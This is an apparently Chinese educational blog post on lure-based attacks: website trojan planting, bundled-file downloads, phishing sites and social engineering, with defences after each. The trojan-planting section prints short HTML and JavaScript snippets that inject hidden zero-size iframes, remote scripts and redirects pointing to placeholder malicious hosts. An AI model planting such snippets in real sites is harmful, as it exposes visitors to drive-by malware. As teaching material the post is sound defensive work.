（4/8 诱骗式攻击）如何成为一名黑客（网络安全从业者）——网络攻击技术篇

        上一节说到了网络协议欺骗，这一节我们将一起来学习：诱骗式攻击。大家需要注意这两者的区别。

---

        诱骗式攻击是指通过伪造的或合成的具有较高迷惑性的信息，诱骗用户进行访问，从而诱导用户触发恶意代码或者骗取被攻击者的敏感信息，达到攻击者入侵系统或获取敏感信息的目的。

        诱骗式攻击与我们昨天学习的网络协议欺骗是不一样的，不同之处在于，网络协议欺骗利用的是协议设计上的缺陷进行，而诱骗式攻击没有利用协议缺陷，而是利用社会工程学中的欺骗技术，通过诱骗用户下载含有恶意代码的软件或访问含有恶意代码的网站、伪造网站，从而实施攻击的技术。

        

        诱骗式攻击主要有网站挂马、诱骗下载、网站钓鱼、社会工程等。

1、网站挂马

---

        网站挂马是指网站中的网页被攻击者篡改后，添加了可以触发并下载恶意程序的链接与恶意代码和脚本。当用户访问被挂马的网站时，如果计算机的Web浏览器及插件中存在安全漏洞，那么这些安全漏洞就会被网页中的恶意代码和脚本进行利用，最终在用户不知情的情况下，使用户自动访问网页中的恶意链接或自动下载木马、病毒。

        网站挂马的前提是攻击者已经成功入侵网站服务器，具有了网站中网页的修改权限。

        网站挂马的主要方法有框架挂马、JS脚本挂马、body挂马以及伪装挂马等。

（1）框架挂马

        即在网页代码中添加隐蔽的iframe框架，打开网页时执行该iframe框架，打开对应的恶意网页或执行脚本。代码如下：

<ifarme src = http://www.xxx.com/yyy.html width=0 height=0></iframe>

        其中，"http://www.xxx.com/yyy.html"为恶意网页，“width=0 height=0”表示该框架的高和宽均为0，即打开的这个网页时不可见的，用户也难以发觉。

        框架挂马主要有直接加载框架代码和框架嵌套挂马两种。直接加载是将上述代码直接加入网页的页面代码中。框架嵌套式通过在框架中多层次的嵌套框架代码，最后的框架包含了恶意网页的地址，这种嵌套式挂马方式的隐蔽性较高。

（2）JS脚本挂马

        将网页木马的代码写入到JS脚本文件中，利用用户打开网页时js脚本文件被调用的方法实现网页木马的隐蔽执行。通常，攻击者会先制作一个zzz.js文件，将下面的语句写入其中：

document.write("<iframe width='0' height='0' src=http://www.xyz.com/aaa.html></iframe>");

        其中，"http:://www.xyz.com/aaa.html"为恶意网页，含有利用漏洞触发木马的代码。然后在网站的页面代码中加入执行zzz.js文件的代码：

<script language=javascript src=http://www.xxx.com/zzz.js></script>

（3）body挂马

        通过HTML文件的body标记添加恶意网页的地址，从而进行挂马。也可以在body中直接加入远程的恶意网址代码：

<body οnlοad="window.loacation='恶意网址';"></body>

也可以在body镖击中添加隐蔽的框架，从而实现body中隐蔽挂马：

top.document.body.innerHTML = top.document.body.innerHTML + '\t\n<iframe src=地址 width='0' height='0'></iframe>';

（4）伪装欺骗挂马

1）图片伪装

        诱骗用户点击网页中的图片，在图片打开之前执行一个写有网页木马链接地址的框架。

<html>

        <iframe src="网页木马地址" height=0 width=0></iframe>

        <img src="图片地址"></center>

</html>

2）调用伪装

        诱骗用户点击某个链接，在调用某个链接之后运行一个框架，打开框架内包含的木马地址。

<frameset rows ="123,0" cols="*">

<frame src="打开网址" frameborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">

<frame src="木马地址" frameborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">

</frameset>

3）网页链接伪装

        在网页中伪装一个可信网址的地址链接，用户点击后实际上连接到一个载有木马的网址。在下面的代码中，在网页显示的链接为”http://www.111.com“；在用户将鼠标移至该链接时，实际将执行www_111_com()函数，在该函数中连接的是远程的木马地址。

<a href="http://www.111.com/" onMouseOver="www_111_com();return true;"></a>

<SCRIPT Language="JavaScript">

function www_111_com()

{

        var url="木马地址";

        open(url, "NewWindow", "toolbar=no,

        location=no,status=no,menubar=no,

        scrollbars=no,copyhistory=yes,

        width=800,height=600,left=10,top=10");

}

</SCRIPT>

网站挂马的防范

        需从Web服务器和客户端两方面防护。

        （1）对于Web服务器，要做好服务器的安全维护，防止入侵，这是防止网站挂马的根本。

        （2）对于个人用户，一是定时对计算机进行安全维护，如及时打补丁，经常升级浏览器。二是建立好安全防护体系，如配置防火墙，安装杀毒软件和及时更新病毒库。

2、诱骗下载

---

       由于人们安全上网的意识越来越强，纯粹依靠漏洞传播病毒的方式以难以奏效，因此攻击者往往采用诱骗手段使用户下载被捆绑了病毒的文件（利用文件捆绑技术），从而实施攻击。

        诱骗下载的主要方式有以下几种：多媒体类文件（如某某影音）、网络游戏软件和插件（外挂）、热门应用软件、电子书、P2P种子文件。

        文件捆绑技术是将两个或两个以上的文件捆绑成一个可执行文件。在执行捆绑文件时，捆绑在一起的文件都会被执行。目前流行的捆绑技术有多文件捆绑、资源融合捆绑、漏洞利用捆绑。

（1）多文件捆绑

        这是最简单的捆绑方式，捆绑时会新建一个PE文件，并自行构造其PE头。待捆绑的其他文件会直接附加到新文件的末尾，第一个文件头的偏移量和每个文件的大小都被记录在PE文件头相应位置。当新PE文件运行时，指令先指向第一个被捆绑文件并将其运行；之后向后跳转，跳转的字段距离为第一个文件的大小。这样指令将指向第二个被捆绑文件并将其运行，然后以同样的方式，直到所有被捆绑的文件都运行完成。

（2）资源融合捆绑

        由于Windows中EXE格式的可执行文件时PE结构的文件。资源区段是PE格式文件中的一个特殊的区段，这里用来包含EXE调用的资源信息。资源融合捆绑的实现需要先构建一个头文件，再利用资源区段更新的API函数将待捆绑的文件作为资源信息通过更新的方式写入这个头文件中，从而完成对多个捆绑文件的资源融合式捆绑。

（3）漏洞利用捆绑

        根据不同漏洞的触发原理，将漏洞触发代码、shellcode代码和待执行程序都嵌入到载体文件中进行捆绑。当处理这种载体文件的应用软件存在安全漏洞时，载体文件一旦嵌入到应用程序中运行，漏洞触发代码就会触发安全漏洞后执行。漏洞触发代码再通过shellcode代码调转到待执行程序，将待执行程序执行起来。

防范诱骗下载

        要想防范诱骗下载，需要用户提高自己的安全防范意思，浏览正规网站，不从非正规网站下载文件，对下载的文件先杀毒再开启，验证软件的哈希值，并且经常升级操作系统。

3、网站钓鱼

---

        钓鱼网站是一种由攻击者制作的被用于网络欺诈的伪造网站，其页面内容几乎与真实的网站一模一样，域名也十分相似。如www.abcchina.cn是农行的官网，攻击者会伪造一个名为www.abcchlna.cn的网站，你能正确分辨钓鱼网站吗。

        钓鱼网站常常与恶意程序相互配合，如某些网址绑架型木马会篡改、锁定浏览器的主页为某个导航站，这个导航站里的链接通常是钓鱼网站的链接。有的能修改用户桌面文件图标或收藏夹内的网址，让用户不经意间访问钓鱼网站。

防范钓鱼网站

        要想防范钓鱼网站，第一个则是要求用户提高防范意识，不盲目轻信中奖信息，然后可以通过以下技术手段来鉴别钓鱼网站：

（1）访问相关网站时，详细检查网址相关域名信息。

（2）针对大型电子商务网站或网银站点通过数字证书鉴别真伪。

（3）查询网站的ICP网站备案信息。

（4）安全安全防护工具

4、社会工程

---

        诱骗式攻击从本质上来说是对社会工程学的实际应用。社会工程学是针对受害者的好奇心、贪婪、心理弱点、本能反应等特点而采取的欺骗、陷阱、伤害等危害手段，以取得利益回报的学问。

        在实施社会工程学之前，需要做大量的准备工作以有助于加深受害者的信任，并诱使其逐步深入社会工程学的陷阱。社会工程学的特点决定了它对信息安全领域产生严重威胁。由于计算机安全防护技术不断提升，从技术层面的攻击难度越来越大；因此，新一代的病毒利用了人的心理弱点，增加了更多的欺骗的因素来达到植入病毒的目的。

        攻击者的目标是信息系统，而人是信息系统中唯一存在个性的环节。为了突破系统的安全防护，达到获取信息的目的，攻击者通过利用针对认得个性情感弱点的社会工程需制造骗术高明的陷阱，诱使受害者在无意识的情况下将恶意程序引入信息系统中。例如”震网“病毒和”火焰“病毒等能够传播到物理隔离的具有高度安全防护措施的内网中，利用的正是社会工程学。

        

最后，推荐大家阅读 凯文·米特尼克 的这两本书：

《反欺骗的艺术》

《反入侵的艺术》

---

        欢迎大家关注我的微信公众号，学习更多关于网络安全的知识。如果你有什么好的建议，也欢迎通过公众号给我留言，一定虚心接受有益的建议。

搜索公众号：Quark网络安全

或长按扫下方的二维码↓↓↓↓↓

---

        免责声明：本公众号发表的所有文章均旨在传播网络安全知识及指导用户保护隐私，至于用户将所学知识用于何种目的或造成何种后果，本微信公众号均无力控制，也概不负责。

        图片源自网络，如有侵权，请告之。